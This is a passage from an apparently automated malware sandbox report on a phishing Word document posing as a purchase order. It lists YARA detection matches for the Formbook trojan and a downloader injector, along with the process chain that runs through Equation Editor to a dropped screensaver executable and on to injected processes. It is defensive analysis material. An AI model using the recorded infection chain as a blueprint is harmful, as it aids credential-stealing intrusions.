            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_004114436_2_00411443
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_0041143A6_2_0041143A
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_004034D06_2_004034D0
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_004025C06_2_004025C0
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_004025F96_2_004025F9
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_004015806_2_00401580
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_004025B36_2_004025B3
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_004116636_2_00411663
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00402ED06_2_00402ED0
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_0040F6E36_2_0040F6E3
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_004027096_2_00402709
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EAE0C66_2_00EAE0C6
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EAE2E96_2_00EAE2E9
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00ED63DB6_2_00ED63DB
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00F563BF6_2_00F563BF
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EFA37B6_2_00EFA37B
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EB23056_2_00EB2305
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00F3443E6_2_00F3443E
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00F305E36_2_00F305E3
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00ECC5F06_2_00ECC5F0
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EF65406_2_00EF6540
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EBE6C16_2_00EBE6C1
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EB46806_2_00EB4680
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00F526226_2_00F52622
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EFA6346_2_00EFA634
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EBC7BC6_2_00EBC7BC
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00ED286D6_2_00ED286D
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EBC85C6_2_00EBC85C
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00F449F56_2_00F449F5
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EC69FE6_2_00EC69FE
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EB29B26_2_00EB29B2
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00F5098E6_2_00F5098E
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EFC9206_2_00EFC920
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00F36BCB6_2_00F36BCB
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00F5CBA46_2_00F5CBA4
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00F52C9C6_2_00F52C9C
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00F3AC5E6_2_00F3AC5E
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EBCD5B6_2_00EBCD5B
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EE0D3B6_2_00EE0D3B
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00ECEE4C6_2_00ECEE4C
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EE2E2F6_2_00EE2E2F
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00F22FDC6_2_00F22FDC
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00F4CFB16_2_00F4CFB1
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EC0F3F6_2_00EC0F3F
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00F2D06D6_2_00F2D06D
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EB30406_2_00EB3040
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EC905A6_2_00EC905A
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EDD0056_2_00EDD005
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00F3D13F6_2_00F3D13F
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00F512386_2_00F51238
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EAF3CF6_2_00EAF3CF
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EB73536_2_00EB7353
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EC14896_2_00EC1489
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EE54856_2_00EE5485
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EED47D6_2_00EED47D
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00F535DA6_2_00F535DA
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EB351F6_2_00EB351F
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EE57C36_2_00EE57C3
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00F3579A6_2_00F3579A
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00F4771D6_2_00F4771D
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00F4F8EE6_2_00F4F8EE
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00F2F8C46_2_00F2F8C4
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00F359556_2_00F35955
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00F3394B6_2_00F3394B
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00F63A836_2_00F63A83
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00F3DBDA6_2_00F3DBDA
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EAFBD76_2_00EAFBD7
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00ED7B006_2_00ED7B00
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00F4FDDD6_2_00F4FDDD
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EDDF7C6_2_00EDDF7C
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00F3BF146_2_00F3BF14
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E926178_2_61E92617
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E451A78_2_61E451A7
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E421618_2_61E42161
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E1F0C68_2_61E1F0C6
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E300588_2_61E30058
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E174C28_2_61E174C2
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E274A18_2_61E274A1
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E4A4B28_2_61E4A4B2
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E396BD8_2_61E396BD
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E478BD8_2_61E478BD
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E778808_2_61E77880
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E35BE28_2_61E35BE2
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E40B418_2_61E40B41
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E47E218_2_61E47E21
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\sqlite3.dll 99E91AE250C955BD403EC1A2321D6B11FCB715BDCC7CB3F63FFB46B349AFDE5C
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: String function: 00F1F970 appears 84 times
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: String function: 00EADF5C appears 137 times
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: String function: 00EAE2A8 appears 60 times
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: String function: 00EF373B appears 253 times
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: String function: 00EF3F92 appears 132 times
            Source: sqlite3.dll.8.drStatic PE information: Number of sections : 18 > 10
            Source: C:\Windows\SysWOW64\dfrgui.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install DirectoryJump to behavior
            Source: MOQ010524Purchase order.doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: 6.2.op55336.scr.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 6.2.op55336.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.op55336.scr.3506390.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 5.2.op55336.scr.3506390.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 5.2.op55336.scr.d40000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 5.2.op55336.scr.d40000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 5.2.op55336.scr.24a19c4.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 5.2.op55336.scr.249f184.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 0000000E.00000002.479625649.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.847226726.00000000003A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.847107222.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.411272581.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.847699564.0000000004DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.847192255.00000000002E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.351612822.0000000000D40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.416629798.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.847416646.0000000003360000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: opp[1].scr.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: op55336.scr.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 5.2.op55336.scr.3506390.5.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
            Source: 5.2.op55336.scr.d40000.1.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
            Source: 5.2.op55336.scr.3506390.5.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
            Source: 5.2.op55336.scr.d40000.1.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@11/15@22/12
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$Q010524Purchase order.docJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrMutant created: NULL
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR6537.tmpJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: dfrgui.exe, 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.8.drBinary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: dfrgui.exe, 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.8.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: dfrgui.exe, 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.8.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: dfrgui.exe, 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.8.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: dfrgui.exe, 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.8.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: dfrgui.exe, 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.8.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: dfrgui.exe, 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.8.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
            Source: MOQ010524Purchase order.docVirustotal: Detection: 41%
            Source: MOQ010524Purchase order.docReversingLabs: Detection: 36%
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\op55336.scr "C:\Users\user\AppData\Roaming\op55336.scr"
            Source: C:\Users\user\AppData\Roaming\op55336.scrProcess created: C:\Users\user\AppData\Roaming\op55336.scr "C:\Users\user\AppData\Roaming\op55336.scr"
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeProcess created: C:\Windows\SysWOW64\dfrgui.exe "C:\Windows\SysWOW64\dfrgui.exe"
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\op55336.scr "C:\Users\user\AppData\Roaming\op55336.scr"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrProcess created: C:\Users\user\AppData\Roaming\op55336.scr "C:\Users\user\AppData\Roaming\op55336.scr"Jump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeProcess created: C:\Windows\SysWOW64\dfrgui.exe "C:\Windows\SysWOW64\dfrgui.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
